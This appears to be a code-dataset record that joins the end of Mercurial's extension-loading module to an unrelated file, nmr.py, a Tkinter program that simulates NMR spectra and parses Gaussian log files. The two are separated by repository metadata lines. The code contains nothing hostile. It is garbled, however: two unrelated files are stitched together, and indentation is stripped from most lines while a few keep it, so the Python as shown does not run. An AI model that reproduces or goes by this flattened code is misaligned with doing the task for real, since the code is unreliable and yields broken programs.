_ignore = ['hbisect', 'bookmarks', 'parentrevspec', 'interhg']
def extensions():
for name in _order:
module = _extensions[name]
if module:
yield name, module
def find(name):
'''return module with given extension name'''
mod = None
try:
mod = _extensions[name]
except KeyError:
for k, v in _extensions.iteritems():
if k.endswith('.' + name) or k.endswith('/' + name):
mod = v
break
if not mod:
raise KeyError(name)
return mod
def loadpath(path, module_name):
module_name = module_name.replace('.', '_')
path = util.expandpath(path)
if os.path.isdir(path):
# module/__init__.py style
d, f = os.path.split(path.rstrip('/'))
fd, fpath, desc = imp.find_module(f, [d])
return imp.load_module(module_name, fd, fpath, desc)
else:
try:
return imp.load_source(module_name, path)
except IOError, exc:
if not exc.filename:
exc.filename = path # python does not fill this
raise
def load(ui, name, path):
if name.startswith('hgext.') or name.startswith('hgext/'):
shortname = name[6:]
else:
shortname = name
if shortname in _ignore:
return None
if shortname in _extensions:
return _extensions[shortname]
_extensions[shortname] = None
if path:
# the module will be loaded in sys.modules
        # choose a unique name so that it doesn't
        # conflict with other modules
mod = loadpath(path, 'hgext.%s' % name)
else:
def importh(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
try:
mod = importh("hgext.%s" % name)
except ImportError, err:
ui.debug('could not import hgext.%s (%s): trying %s\n'
% (name, err, name))
mod = importh(name)
_extensions[shortname] = mod
_order.append(shortname)
return mod
def loadall(ui):
result = ui.configitems("extensions")
newindex = len(_order)
for (name, path) in result:
if path:
if path[0] == '!':
continue
try:
load(ui, name, path)
except KeyboardInterrupt:
raise
except Exception, inst:
if path:
ui.warn(_("*** failed to import extension %s from %s: %s\n")
% (name, path, inst))
else:
ui.warn(_("*** failed to import extension %s: %s\n")
% (name, inst))
if ui.traceback():
return 1
for name in _order[newindex:]:
uisetup = getattr(_extensions[name], 'uisetup', None)
if uisetup:
uisetup(ui)
for name in _order[newindex:]:
extsetup = getattr(_extensions[name], 'extsetup', None)
if extsetup:
try:
extsetup(ui)
except TypeError:
if extsetup.func_code.co_argcount != 0:
raise
extsetup() # old extsetup with no ui argument
def wrapcommand(table, command, wrapper):
'''Wrap the command named `command' in table
Replace command in the command table with wrapper. The wrapped command will
be inserted into the command table specified by the table argument.
The wrapper will be called like
wrapper(orig, *args, **kwargs)
where orig is the original (wrapped) function, and *args, **kwargs
are the arguments passed to it.
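    A minimal usage sketch from an extension's uisetup() (the wrapper name and
    extension boilerplate here are illustrative):
        def quietpush(orig, ui, repo, *args, **opts):
            # do something before or after the real push runs
            return orig(ui, repo, *args, **opts)
        def uisetup(ui):
            from mercurial import commands
            extensions.wrapcommand(commands.table, 'push', quietpush)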
'''
assert util.safehasattr(wrapper, '__call__')
aliases, entry = cmdutil.findcmd(command, table)
for alias, e in table.iteritems():
if e is entry:
key = alias
break
origfn = entry[0]
def wrap(*args, **kwargs):
return util.checksignature(wrapper)(
util.checksignature(origfn), *args, **kwargs)
wrap.__doc__ = getattr(origfn, '__doc__')
wrap.__module__ = getattr(origfn, '__module__')
newentry = list(entry)
newentry[0] = wrap
table[key] = tuple(newentry)
return entry
def wrapfunction(container, funcname, wrapper):
'''Wrap the function named funcname in container
Replace the funcname member in the given container with the specified
wrapper. The container is typically a module, class, or instance.
The wrapper will be called like
wrapper(orig, *args, **kwargs)
where orig is the original (wrapped) function, and *args, **kwargs
are the arguments passed to it.
Wrapping methods of the repository object is not recommended since
it conflicts with extensions that extend the repository by
subclassing. All extensions that need to extend methods of
localrepository should use this subclassing trick: namely,
reposetup() should look like
def reposetup(ui, repo):
class myrepo(repo.__class__):
def whatever(self, *args, **kwargs):
[...extension stuff...]
super(myrepo, self).whatever(*args, **kwargs)
[...extension stuff...]
repo.__class__ = myrepo
In general, combining wrapfunction() with subclassing does not
work. Since you cannot control what other extensions are loaded by
your end users, you should play nicely with others by using the
subclass trick.
'''
assert util.safehasattr(wrapper, '__call__')
def wrap(*args, **kwargs):
return wrapper(origfn, *args, **kwargs)
origfn = getattr(container, funcname)
assert util.safehasattr(origfn, '__call__')
setattr(container, funcname, wrap)
return origfn
def _disabledpaths(strip_init=False):
'''find paths of disabled extensions. returns a dict of {name: path}
removes /__init__.py from packages if strip_init is True'''
import hgext
extpath = os.path.dirname(os.path.abspath(hgext.__file__))
try: # might not be a filesystem path
files = os.listdir(extpath)
except OSError:
return {}
exts = {}
for e in files:
if e.endswith('.py'):
name = e.rsplit('.', 1)[0]
path = os.path.join(extpath, e)
else:
name = e
path = os.path.join(extpath, e, '__init__.py')
if not os.path.exists(path):
continue
if strip_init:
path = os.path.dirname(path)
if name in exts or name in _order or name == '__init__':
continue
exts[name] = path
return exts
def _moduledoc(file):
'''return the top-level python documentation for the given file
Loosely inspired by pydoc.source_synopsis(), but rewritten to
handle triple quotes and to return the whole text instead of just
the synopsis'''
result = []
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line:
break
start = line[:3]
if start == '"""' or start == "'''":
line = line[3:]
while line:
if line.rstrip().endswith(start):
line = line.split(start)[0]
if line:
result.append(line)
break
elif not line:
return None # unmatched delimiter
result.append(line)
line = file.readline()
else:
return None
return ''.join(result)
def _disabledhelp(path):
'''retrieve help synopsis of a disabled extension (without importing)'''
try:
file = open(path)
except IOError:
return
else:
doc = _moduledoc(file)
file.close()
if doc: # extracting localized synopsis
return gettext(doc).splitlines()[0]
else:
return _('(no help text available)')
def disabled():
'''find disabled extensions from hgext. returns a dict of {name: desc}'''
try:
from hgext import __index__
return dict((name, gettext(desc))
for name, desc in __index__.docs.iteritems()
if name not in _order)
except ImportError:
pass
paths = _disabledpaths()
if not paths:
return {}
exts = {}
for name, path in paths.iteritems():
doc = _disabledhelp(path)
if doc:
exts[name] = doc
return exts
def disabledext(name):
'''find a specific disabled extension from hgext. returns desc'''
try:
from hgext import __index__
if name in _order: # enabled
return
else:
return gettext(__index__.docs.get(name))
except ImportError:
pass
paths = _disabledpaths()
if name in paths:
return _disabledhelp(paths[name])
def disabledcmd(ui, cmd, strict=False):
'''import disabled extensions until cmd is found.
returns (cmdname, extname, module)'''
paths = _disabledpaths(strip_init=True)
if not paths:
raise error.UnknownCommand(cmd)
def findcmd(cmd, name, path):
try:
mod = loadpath(path, 'hgext.%s' % name)
except Exception:
return
try:
aliases, entry = cmdutil.findcmd(cmd,
getattr(mod, 'cmdtable', {}), strict)
except (error.AmbiguousCommand, error.UnknownCommand):
return
except Exception:
ui.warn(_('warning: error finding commands in %s\n') % path)
ui.traceback()
return
for c in aliases:
if c.startswith(cmd):
cmd = c
break
else:
cmd = aliases[0]
return (cmd, name, mod)
ext = None
# first, search for an extension with the same name as the command
path = paths.pop(cmd, None)
if path:
ext = findcmd(cmd, cmd, path)
if not ext:
# otherwise, interrogate each extension until there's a match
for name, path in paths.iteritems():
ext = findcmd(cmd, name, path)
if ext:
break
if ext and 'DEPRECATED' not in ext.__doc__:
return ext
raise error.UnknownCommand(cmd)
def enabled():
'''return a dict of {name: desc} of extensions'''
exts = {}
for ename, ext in extensions():
doc = (gettext(ext.__doc__) or _('(no help text available)'))
ename = ename.split('.')[-1]
exts[ename] = doc.splitlines()[0].strip()
return exts
|
apache-2.0
|
tam10/nmr
|
nmr.py
|
1
|
33679
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 6 11:50:10 2017
@author: Tristan Mackenzie
QNMR is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
QNMR is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with QNMR. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
import scipy.ndimage as ndi
import scipy.interpolate as interpolate
import sys
if sys.version_info[0] == 3:
import tkinter as tk
import tkinter.messagebox as msgbox
from tkinter.filedialog import askopenfilename, asksaveasfilename
else:
import Tkinter as tk
import tkMessageBox as msgbox
from tkFileDialog import askopenfilename, asksaveasfilename
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib import pyplot as plt
class GUI():
def __init__(self):
self.root = tk.Tk()
self.root.title("NMR GUI")
self.root.resizable(0,0)
sunken = dict(height = 2, bd = 1, relief = "sunken")
self.figure = plt.figure(figsize = (10, 5))
self.ax = self.figure.add_subplot(111)
self.ax.invert_xaxis()
self.peak = None
self.peaks = []
self.splitting = None
self.splittings = []
fs = self.frames = {}
cs = self.canvases = {}
ls = self.labels = {}
mes = self.machine_entries = {}
pes = self.peak_entries = {}
ses = self.splitting_entries = {}
bs = self.buttons = {}
ms = self.optionmenus = {}
fs ["machine"] = _add_frame(dict(master=self.root, text="Machine", **sunken), gk('000055news'))
ls ["frequency"] = _add_label(fs["machine"], {"text": "Operating Frequency (MHz):"}, gk('00w'))
mes["machine_frequency_mhz"] = _add_entry(fs["machine"], "", {}, gk('010300'))
ls ["noise"] = _add_label(fs["machine"], {"text": "Noise:"}, gk('10w'))
mes["noise"] = _add_entry(fs["machine"], "", {}, gk('110300'))
ls ["resolution"] = _add_label(fs["machine"], {"text": "Resolution (ppm):"}, gk('20w'))
mes["resolution"] = _add_entry(fs["machine"], "", {}, gk('210300'))
ls ["min_x"] = _add_label(fs["machine"], {"text": "Range (ppm):"}, gk('30w'))
mes["min_x"] = _add_entry(fs["machine"], "", {}, gk('31w'), {"width": 3})
ls ["max_x"] = _add_label(fs["machine"], {"text": "to:"}, gk('32w'))
mes["max_x"] = _add_entry(fs["machine"], "", {}, gk('33w'), {"width": 3})
fs["peaks"] = _add_frame(dict(master=self.root, text="Peaks", **sunken), gk('100055news'))
bs["add_peak"] = _add_button(fs["peaks"], {"text": "Add Peak"}, gk('000055w'), {"<Button-1>": self.add_peak})
bs["remove_peak"] = _add_button(fs["peaks"], {"text": "Remove Peak"}, gk('010055w'), {"<Button-1>": self.remove_peak})
ls["peaks"] = _add_label(fs["peaks"], {"text": "Peaks:"}, gk('10w'))
ms["peaks"], self.peak_string = _add_optionmenu(fs["peaks"], " ", [" "], {"command": self._update_peak_om}, gk('1103ew'), {"width": 10})
ls ["shift"] = _add_label(fs["peaks"], {"text": "Shift (ppm):"}, gk('20w'))
pes["shift"] = _add_entry(fs["peaks"], "", {}, gk('21w'), attach_func=self._set_peak_string)
ls ["p_nuclei"] = _add_label(fs["peaks"], {"text": "Nuclei:"}, gk('22w'))
pes["nuclei"] = _add_entry(fs["peaks"], "", {}, gk('23w'), attach_func=self._set_peak_string)
ls ["hwhm"] = _add_label(fs["peaks"], {"text": "Half Width Half Maximum (ppm):"}, gk('3003w'))
pes["hwhm"] = _add_entry(fs["peaks"], "", {}, gk('33w'), attach_func=self._set_peak_string)
fs["splittings"] = _add_frame(dict(master=fs["peaks"], text="Splitting Nuclei", **sunken), gk('400455news'))
bs["add_splitting"] = _add_button(fs["splittings"], {"text": "Add Splitting"}, gk('000055w'), {"<Button-1>": self.add_splitting})
bs["remove_splitting"] = _add_button(fs["splittings"], {"text": "Remove Splitting"}, gk('010055w'), {"<Button-1>": self.remove_splitting})
ls["splittings"] = _add_label(fs["splittings"], {"text": "Splittings:"}, gk('10w'))
ms["splittings"], self.splitting_string = _add_optionmenu(fs["splittings"], " ", [" "], {}, gk('1103ew'), {"width": 10})
ls ["coupling"] = _add_label(fs["splittings"], {"text": "J Coupling (Hz):"}, gk('20w'))
ses["coupling"] = _add_entry(fs["splittings"], "", {}, gk('21w'), attach_func=self._set_splitting_string)
ls ["s_nuclei"] = _add_label(fs["splittings"], {"text": "Nuclei:"}, gk('22w'))
ses["nuclei"] = _add_entry(fs["splittings"], "", {}, gk('23w'), attach_func=self._set_splitting_string)
ls ["spin"] = _add_label(fs["splittings"], {"text": "Spin:"}, gk('30w'))
ses["spin"] = _add_entry(fs["splittings"], "", {}, gk('31w'), attach_func=self._set_splitting_string)
ls ["abundance"] = _add_label(fs["splittings"], {"text": "Abundance:"}, gk('32w'))
ses["abundance"] = _add_entry(fs["splittings"], "", {}, gk('33w'), attach_func=self._set_splitting_string)
fs["controls"] = _add_frame(dict(master=self.root, text="Controls", **sunken), gk('200055news'))
bs["update"] = _add_button(fs["controls"], {"text": "Update"}, gk('000055ew') ,{"<Button-1>": self.update})
bs["parse"] = _add_button(fs["controls"], {"text": "From .log"}, gk('010055ew') ,{"<Button-1>": self.parse})
bs["export"] = _add_button(fs["controls"], {"text": "Export Data"}, gk('020055ew') ,{"<Button-1>": self.export})
fs["plot"] = _add_frame(dict(master=self.root, text="Plot", **sunken), gk('012055news'))
cs["plot"] = _add_mpl_canvas(fs["plot"], self.figure, gk('00'))
cs["plot"].get_tk_widget().grid(row=0, column=0)
fs["toolbar"] = _add_frame(dict(master=self.root, text="", **sunken), gk('210055news'))
self.toolbar = NavigationToolbar2TkAgg(cs["plot"], fs["toolbar"])
self.toolbar.grid(row=0, column=0)
self._add_nmr()
self._add_nmr_parser()
self.root.protocol("WM_DELETE_WINDOW", self._cl)
self.root.mainloop()
def _add_nmr(self, *args):
self.nmr = NMR()
for key, entry in self.machine_entries.items():
entry.configure(textvariable=getattr(self.nmr, key), state=tk.NORMAL)
def _add_nmr_parser(self, *args):
self.nmr_parser = NMRParser()
self.nmr_parser._ask_spin_abundance = self._ask_spin_abundance
def _cl(self):
plt.close('all')
self.root.destroy()
def _set_peak(self, peak, *args):
self.peak = peak
self._peak_changed()
try:
splitting = self.peak.splittings[0]
except (IndexError, AttributeError):
splitting = None
self.splittings = self.peak.splittings
self._set_splitting(splitting)
def _set_peak_string(self, *args):
self.peak_string.set(repr(self.peak))
self._update_peak_om()
def _peak_changed(self, *args):
self._set_peak_string()
self._update_peak_entries()
def _update_peak_om(self):
om = self.optionmenus["peaks"]
menu = om['menu']
menu.delete(0, tk.END)
for peak in self.peaks:
string = repr(peak)
menu.add_command(label = string, command = lambda value=peak: self._set_peak(value))
def add_peak(self, *args):
peak = Peak(self.nmr, 1, 7)
self.peaks.append(peak)
self.nmr.peaks.append(peak)
self._set_peak(peak)
def remove_peak(self, *args):
peak = self.peak
self.nmr.peaks.remove(peak)
self.peaks.remove(peak)
try:
peak = self.peaks[0]
except IndexError:
peak = None
self._set_peak(peak)
def _update_peak_entries(self, *args):
peak = self.peak
if peak:
for key, entry in self.peak_entries.items():
entry.configure(textvariable=getattr(peak, key), state=tk.NORMAL)
else:
for key, entry in self.peak_entries.items():
entry.configure(textvariable=tk.StringVar(value=""), state=tk.DISABLED)
def _set_splitting(self, splitting, *args):
self.splitting = splitting
self._splitting_changed()
def _set_splitting_string(self, *args):
self.splitting_string.set(repr(self.splitting))
self._update_splitting_om()
def _splitting_changed(self, *args):
self._set_splitting_string()
self._update_splitting_entries()
def _update_splitting_om(self):
om = self.optionmenus["splittings"]
menu = om['menu']
menu.delete(0, tk.END)
for splitting in self.splittings:
string = repr(splitting)
menu.add_command(label = string, command = lambda value=splitting: self._set_splitting(value))
def add_splitting(self, *args):
splitting = Splitting(0.5, 1, 20, 1)
self.splittings.append(splitting)
self.peak.splittings.append(splitting)
self._set_splitting(splitting)
def remove_splitting(self, *args):
s0 = self.splitting
for i, s1 in enumerate(self.peak.splittings):
if s0 == s1:
del self.peak.splittings[i]
break
for i, s1 in enumerate(self.splittings):
if s0 == s1:
                del self.splittings[i]
break
try:
splitting = self.splittings[0]
except IndexError:
splitting = None
self._set_splitting(splitting)
def _update_splitting_entries(self, *args):
splitting = self.splitting
if splitting:
for key, entry in self.splitting_entries.items():
entry.configure(textvariable=getattr(splitting, key), state=tk.NORMAL)
else:
for key, entry in self.splitting_entries.items():
entry.configure(textvariable=tk.StringVar(value=""), state=tk.DISABLED)
def _ask_spin_abundance(self, element):
while True:
sp = EntryPopup(self, "Input nuclear spin for element {}:".format(element))
sp.root.wait_window()
spin = sp.value
try:
spin = float(spin)
if spin % 0.5 == 0 and spin >= 0:
break
except:
pass
msgbox.showerror("Error", "Spin must be positive half-integer")
while True:
sp = EntryPopup(self, "Input abundance (0-1) for element {}:".format(element))
sp.root.wait_window()
abundance = sp.value
try:
abundance = float(abundance)
if 0 < abundance < 1:
break
except:
pass
msgbox.showerror("Error", "Abundance must be between 0 and 1")
def update(self, *args):
xs, ys = self.nmr.get_plot()
min_x = float(self.nmr.min_x.get())
max_x = float(self.nmr.max_x.get())
self.ax.clear()
self.ax.plot(xs, ys)
self.ax.set_xlim(min_x, max_x)
self.ax.set_xlabel("Chemical Shift (ppm)")
self.ax.yaxis.set_visible(False)
self.ax.invert_xaxis()
self.figure.tight_layout()
self.canvases["plot"].draw()
def parse(self, *args):
fn = askopenfilename(filetypes = (("Gaussian Log File", "*.log"), ("All Files", "*.*")))
self.nmr_parser.parse(fn)
gp = LoadGaussianPopup(self, self.nmr_parser)
gp.root.wait_window()
shifts = []
try:
gaussian_nmr_list = self.gaussian_nmr_list
self.nmr.peaks = []
self.peaks = []
self.splittings = []
for shift, splittings in gaussian_nmr_list:
shifts.append(shift)
peak = Peak(self.nmr, 1, shift)
self.peaks.append(peak)
self.nmr.peaks.append(peak)
for coupling, spin, degeneracy in splittings:
splitting = Splitting(spin, degeneracy, coupling, 1)
peak.splittings.append(splitting)
for splitting in peak.splittings:
self.splittings.append(splitting)
self._set_peak(peak)
self._set_splitting(splitting)
min_x = min(shifts)
max_x = max(shifts)
diff = max_x - min_x
self.nmr.min_x.set(round(min_x - 0.2 * diff) - 1)
self.nmr.max_x.set(round(max_x + 0.2 * diff) + 1)
self.update()
except:
msgbox.showerror("Error", "Could not load Gaussian .log File")
raise
def export(self, *args):
try:
line = self.ax.lines[0]
except IndexError:
msgbox.showerror("No Data", "No data to export!")
return
data = line.get_xydata()
fn = asksaveasfilename(filetypes = [("CSV Files", "*.csv")])
with open(fn, "w") as f:
for row in data:
f.write("{},{}\n".format(*row))
class NMR():
def __init__(self):
self.machine_frequency_mhz = tk.StringVar(value='400')
self.peaks = []
self.resolution = tk.StringVar(value='0.01')
self._epsilon = tk.StringVar(value='1e-6')
self.noise = tk.StringVar(value='0.1')
self.min_x = tk.StringVar(value='0')
self.max_x = tk.StringVar(value='12')
def get_plot(self):
min_x = float(self.min_x.get())
max_x = float(self.max_x.get())
res = float(self.resolution.get())
noise = float(self.noise.get())
xs = np.arange(min_x, max_x + res, res)
ys = np.random.random(len(xs)) * noise
for i, peak in enumerate(self.peaks):
p_xs, p_ys = peak.generate(min_x, max_x)
p_y_ints = interpolate.griddata(p_xs, p_ys, xs, method='linear')
ys += p_y_ints
return xs, ys
def __repr__(self):
return "NMR(freq={}, resolution={}, noise={}, min_x={}, max_x={}".format(
self.machine_frequency_mhz.get(),
self.resolution.get(),
self.noise.get(),
self.min_x.get(),
self.max_x.get()
)
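# Each Peak below renders a Lorentzian (Cauchy) line shape centred on its
# chemical shift; generate() then applies every attached Splitting by
# convolving that line (scipy.ndimage.convolve1d) with a stick pattern whose
# spacing is the J coupling divided by the spectrometer frequency (Hz -> ppm).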
class Peak():
def __init__(self, parent, nuclei, shift, hwhm=0.01):
self.nuclei = tk.StringVar(value=nuclei)
self.shift = tk.StringVar(value=shift)
self.hwhm = tk.StringVar(value=hwhm)
self.parent = parent
self.splittings = []
def cauchy(self, min_x, max_x):
res = float(self.parent.resolution.get())
hwhm = float(self.hwhm.get())
mf = float(self.parent.machine_frequency_mhz.get())
nuclei = float(self.nuclei.get())
shift = float(self.shift.get())
#Extend x domain to include off-chart contributions to splitting + FWHM
max_split = 2 * hwhm
for S in self.splittings:
nuclei = int(S.nuclei.get())
spin = float(S.spin.get())
coupling = float(S.coupling.get())
max_split += (coupling * (nuclei * spin + 1) / mf)
min_x -= (round(max_split / res)) * res
max_x += (round(max_split / res)) * res
xs = np.arange(min_x, max_x + res, res)
ys = []
for x in xs:
ys.append((nuclei / (np.pi * hwhm * (1 + ((x - shift) / hwhm) ** 2))))
return xs, ys
def generate(self, min_x, max_x):
res = float(self.parent.resolution.get())
epsilon = float(self.parent._epsilon.get())
mf = float(self.parent.machine_frequency_mhz.get())
xs, ys = self.cauchy(min_x, max_x)
if len(xs) == 0:
return [], []
for S in self.splittings:
nuclei = int(S.nuclei.get())
spin = float(S.spin.get())
coupling = float(S.coupling.get())
s = list(S.get_splitting())
j_split = float(coupling) / mf
max_j = (nuclei * spin) * j_split
conv_xs = np.arange(- max_j, max_j + res, res)
conv_ys = []
j = - max_j
for i, conv_x in enumerate(conv_xs):
if j - conv_x <= epsilon:
conv_ys.append(s.pop(0))
j += j_split * 0.5
else:
conv_ys.append(0.0)
ys = ndi.convolve1d(ys, conv_ys)
return xs, np.array(ys)
def __repr__(self):
return "Peak(nuclei={}, shift={:.3f}, hwhm={:.3f})".format(int(self.nuclei.get()), float(self.shift.get()), float(self.hwhm.get()))
class Splitting():
def __init__(self, spin, nuclei, coupling, abundance):
self.spin = tk.StringVar(value=spin)
self.nuclei = tk.StringVar(value=nuclei)
self.coupling = tk.StringVar(value=coupling)
self.abundance = tk.StringVar(value=abundance)
def get_splitting(self):
abundance = float(self.abundance.get())
row = self.pascal()
norm = sum(row)
row *= abundance / norm
        mid = (len(row) - 1) // 2  # integer index; '/' would yield a float under Python 3
row[mid] += 1 - abundance
return row
def pascal(self):
spin = float(self.spin.get())
nuclei = int(self.nuclei.get())
if not spin % 0.5 == 0:
raise ValueError("Spin must be divisible by 0.5")
#Number of elements
n = int(4 * spin * nuclei + 1)
prev_row = [1 if i == 2 * spin * nuclei else 0 for i in range(n)]
for nucleus in range(nuclei):
row = []
for i, element in enumerate(range(n)):
v = 0
for p_i, p_element in enumerate(prev_row):
if abs(p_i - i) <= 2 * spin and (p_i - i) % 2 == 2 * spin % 2:
v += p_element
row.append(float(v))
prev_row = row
return np.array(row)
def __repr__(self):
return "Splitting(spin={:.1f}, nuclei={}, coupling={:.3f}, abundance={:.3%})".format(
float(self.spin.get()),
int(self.nuclei.get()),
float(self.coupling.get()),
float(self.abundance.get())
)
def __eq__(self, other):
if isinstance(other, Splitting):
for a in ["spin", "nuclei", "coupling", "abundance"]:
if getattr(self, a).get() != getattr(other, a).get():
return False
return True
else:
return False
class NMRParser():
def __init__(self):
self.peak_dict = {}
self.coupling_degeneracy_threshold = 1
self.spin_dict = {
"H" : [0.5, 1],
"C" : [0.5, 0.011],
"N" : [0.5, 0.00365],
"O" : [0, 0],
"S" : [1.5, 0.0076],
"Si": [0.5, 0.047]
}
def parse(self, fn):
with open(fn, "r") as f:
lines = f.readlines()
ln = 0
n_ln = len(lines)
n_ats = 0
elements = []
shifts = []
spins = []
while ln < n_ln:
line = lines[ln]
if n_ats == 0:
if line.strip() in ["Input orientation:", "Standard orientation:"]:
ln += 5
while not lines[ln].strip().startswith('----'):
n_ats += 1
ln += 1
elif line.strip() == "SCF GIAO Magnetic shielding tensor (ppm):":
at = 0
while at < n_ats:
s_line = lines[ln].split()
skip = False
try:
at = int(s_line[0])
shifts.append(float(s_line[4]))
element = s_line[1]
elements.append(element)
except:
skip = True
if not skip:
try:
spin = self.spin_dict[element][0]
except:
spin = self._ask_spin_abundance(element)
self.spin_dict[element] = [spin, 1]
spins.append(spin)
ln += 1
elif line.strip() == "Total nuclear spin-spin coupling J (Hz):":
ln += 2
j_table = np.zeros((n_ats, n_ats))
i = j = at = 0
init_j = 0
while i < n_ats and j < n_ats:
at = 0
while at < n_ats:
j = init_j
s_line = lines[ln].split()
at += 1
try:
i = int(s_line[0]) - 1
except ValueError:
break
for j_el in s_line[1:]:
coupling = float(j_el.replace("D", "E"))
j_table[i][j] = j_table[j][i] = abs(coupling)
j += 1
if i + 1 >= n_ats:
ln += 1
break
ln += 1
ln += 1
try:
init_j = int(lines[ln].split()[0]) - 1
except ValueError:
break
ln += 1
for at in range(n_ats):
pd = {}
pd["Element"] = elements[at]
pd["Shift" ] = shifts[at]
try:
j_list = []
for j, el in enumerate(j_table[at]):
j_list.append([el, spins[j], elements[j], 1])
j_list = sorted(j_list, key = lambda x: x[0])
pd["J Coupling"] = j_list
except NameError:
pd["J Coupling"] = {}
self.peak_dict[at] = pd
def set_j_degeneracy(self):
for at, pd in self.peak_dict.items():
j_list = pd["J Coupling"]
degeneracy_j_list = []
for c, s, e, d in j_list:
if c > self.coupling_degeneracy_threshold:
skip = False
for i, (dc, ds, de, dd) in enumerate(degeneracy_j_list):
if abs(c - np.average(dc)) <= self.coupling_degeneracy_threshold and e == de:
degeneracy_j_list[i][0].append(c)
degeneracy_j_list[i][3] += 1
skip = True
break
if not skip:
degeneracy_j_list.append([[c], s, e, 1])
degeneracy_j_list = [[np.average(dc), ds, de, dd] for dc, ds, de, dd in degeneracy_j_list]
self.peak_dict[at]["J Coupling"] = degeneracy_j_list
def _ask_spin_abundance(self, element):
try:
input = raw_input
except NameError:
pass
while True:
spin = input("Input nuclear spin for element {}:".format(element))
try:
spin = float(spin)
if spin % 0.5 == 0 and spin >= 0:
break
except:
pass
print("Spin must be positive half-integer")
while True:
abundance = input("Input abundance (0-1) for element {}:".format(element))
try:
abundance = float(abundance)
if 0 <= abundance <= 1:
break
except:
pass
print("Abundance must be between 0 and 1")
return [spin, abundance]
class EntryPopup(object):
def __init__(self, parent, text):
self.root = tk.Toplevel(parent.root)
self.parent = parent
self.value = ""
self.label = _add_label(self.root, {"text": text}, gk('00'))
self.entry = _add_entry(self.root, "", {}, gk('01'))
self.ok_button = _add_button(self.root, {"text": "OK" }, gk('10'), {"<Button-1>": self._ok})
self.cancel_button = _add_button(self.root, {"text": "Cancel"}, gk('11'), {"<Button-1>": self._cancel})
self.root.protocol("WM_DELETE_WINDOW", self._cl)
def _cl(self, *args):
self.root.destroy()
def _ok(self, *args):
self.value = self.entry.get()
self.root.destroy()
def _cancel(self, *args):
self.root.destroy()
class LoadGaussianPopup(object):
def __init__(self, parent, parser):
self.root = tk.Toplevel(parent.root)
self.parent = parent
self.parser = parser
ell = []
for at, pd in parser.peak_dict.items():
element = pd['Element']
if element not in ell:
ell.append(element)
self.element_label = _add_label(self.root, {"text": "Select Element:"}, gk('00w'))
self.elements_om, self.element = _add_optionmenu(self.root, 'H' if 'H' in ell else ell[0], ell, {}, gk('01ew'))
self.reference_label = _add_label(self.root, {"text": "Reference Shift (ppm):"}, gk('10w'))
self.reference_entry = _add_entry(self.root, "", {}, gk('11w'))
self.degeneracy_label = _add_label(self.root, {"text": "Degeneracy Threshold (Hz):"}, gk('20w'))
self.degeneracy_entry = _add_entry(self.root, "1", {}, gk('21w'))
self.decouple_label = _add_label(self.root, {"text": "Decouple Elements?"}, gk('30w'))
self.decouple = tk.BooleanVar(value=True)
_add_checkbutton(self.root, True, {}, gk('31'), variable=self.decouple)
self.go_button = _add_button(self.root, {"text": "Go"}, gk('40ew'), {"<Button-1>": self.go})
self.root.protocol("WM_DELETE_WINDOW", self._cl)
def _cl(self, *args):
self.root.destroy()
def _get_ref(self):
try:
reference = float(self.reference_entry.get())
if reference > 0:
return reference
except:
pass
msgbox.showerror("Error", "Reference Shift must be a positive float")
return None
def _get_degeneracy(self):
try:
degeneracy = float(self.degeneracy_entry.get())
if degeneracy > 0:
return degeneracy
except:
pass
msgbox.showerror("Error", "Degeneracy Threshold must be a positive float")
return None
def go(self, *args):
reference = self._get_ref()
if reference is None:
return
degeneracy_threshold = self._get_degeneracy()
if degeneracy_threshold is None:
return
chosen_element = self.element.get()
decouple = self.decouple.get()
self.parser.coupling_degeneracy_threshold = degeneracy_threshold
self.parser.set_j_degeneracy()
nmr_list = []
for at, pd in self.parser.peak_dict.items():
j_list= pd['J Coupling']
shift = pd['Shift']
element = pd['Element']
if element == chosen_element:
nmr_list.append([reference - shift, [[c, s, d] for c, s, e, d in j_list if not decouple or e == element]])
self.parent.gaussian_nmr_list = nmr_list
self.root.destroy()
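# gk() below expands a compact grid-spec string into tkinter grid() keyword
# arguments: the digits map to row, column, rowspan, columnspan, padx and pady
# (right-padded with zeros to six digits), and any of 'n', 'e', 'w', 's'
# become the sticky value. For example, gk('1103ew') yields
# {'row': 1, 'column': 1, 'columnspan': 3, 'sticky': 'ew'}.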
def gk(string):
grid = "".join([s for s in string if s.isdigit()])
sticky = "".join([s for s in string if s in "news"])
grid = grid.ljust(6, '0')
r,c,rs,cs,px,py = [int(s) for s in grid]
g = {"row": r, "column": c}
if rs: g["rowspan"] = rs
if cs: g["columnspan"] = cs
if px: g["padx"] = px
if py: g["pady"] = px
if sticky: g["sticky"] = sticky
return g
def _add_frame(frame_kwargs={}, grid_kwargs={}):
"""Insert a frame (box) into parent.
With text, a labelled frame is used"""
if "text" in frame_kwargs:
frame = tk.LabelFrame(**frame_kwargs)
else:
frame = tk.Frame(**frame_kwargs)
frame.grid(**grid_kwargs)
return frame
def _add_label(frame, text_kwargs={}, grid_kwargs={}, config_kwargs={}):
"""Insert a label"""
label = tk.Label(frame, **text_kwargs)
label.grid(**grid_kwargs)
label.config(**config_kwargs)
return label
def _add_scale(frame, val, scale_kwargs={}, grid_kwargs={}, config_kwargs={}):
"""Insert a scrollable bar"""
variable = tk.StringVar()
variable.set(val)
scale = tk.Scale(frame, **scale_kwargs)
scale.set(variable.get())
scale.grid(**grid_kwargs)
scale.config(**config_kwargs)
scale.grid_columnconfigure(0, weight = 1)
return scale
def _add_button(frame, button_kwargs={}, grid_kwargs={}, bind_kwargs={}, config_kwargs={}):
"Insert a button"""
button = tk.Button(frame, **button_kwargs)
button.grid(**grid_kwargs)
for k, v in bind_kwargs.items():
button.bind(k, v)
button.config(bg = "blue", **config_kwargs)
return button
def _add_entry(frame, val, entry_kwargs={}, grid_kwargs={}, config_kwargs={}, attach_func=None):
"""Add a text entry"""
variable = tk.StringVar()
variable.set(val)
entry = tk.Entry(frame, textvariable=variable, **entry_kwargs)
